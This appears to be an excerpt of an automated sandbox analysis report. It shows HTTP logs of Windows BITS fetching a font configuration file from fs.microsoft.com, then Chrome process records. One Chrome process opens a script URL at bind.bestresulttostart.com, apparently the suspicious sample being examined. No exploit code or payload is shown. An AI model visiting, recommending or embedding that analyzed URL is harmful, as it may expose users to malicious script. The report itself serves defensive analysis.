      TimestampBytes transferredDirectionData
      2024-04-25 09:19:44 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: identity
      User-Agent: Microsoft BITS/7.8
      Host: fs.microsoft.com
      2024-04-25 09:19:44 UTC467INHTTP/1.1 200 OK
      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
      Content-Type: application/octet-stream
      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
      Server: ECAcc (chd/0712)
      X-CID: 11
      X-Ms-ApiVersion: Distribute 1.2
      X-Ms-Region: prod-eus-z1
      Cache-Control: public, max-age=164629
      Date: Thu, 25 Apr 2024 09:19:44 GMT
      Connection: close
      X-CID: 2


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.54971723.216.73.151443
      TimestampBytes transferredDirectionData
      2024-04-25 09:19:45 UTC239OUTGET /fs/windows/config.json HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: identity
      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
      Range: bytes=0-2147483646
      User-Agent: Microsoft BITS/7.8
      Host: fs.microsoft.com
      2024-04-25 09:19:45 UTC531INHTTP/1.1 200 OK
      Content-Type: application/octet-stream
      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
      ApiVersion: Distribute 1.1
      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
      X-Azure-Ref: 0DZ+oYgAAAABSxwJpMgMuSLkfS640ajfFQVRBRURHRTEyMTkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
      Cache-Control: public, max-age=164627
      Date: Thu, 25 Apr 2024 09:19:45 GMT
      Content-Length: 55
      Connection: close
      X-CID: 2
      2024-04-25 09:19:45 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


      Click to jump to process

      Click to jump to process

      Click to jump to process

      Target ID:0
      Start time:11:19:34
      Start date:25/04/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Imagebase:0x7ff715980000
      File size:3'242'272 bytes
      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:2
      Start time:11:19:37
      Start date:25/04/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 --field-trial-handle=2336,i,16502000331635370326,7133518324647043838,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Imagebase:0x7ff715980000
      File size:3'242'272 bytes
      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:3
      Start time:11:19:39
      Start date:25/04/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bind.bestresulttostart.com/scripts/statistics.js?s=7.8.2"
      Imagebase:0x7ff715980000
      File size:3'242'272 bytes
      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      No disassembly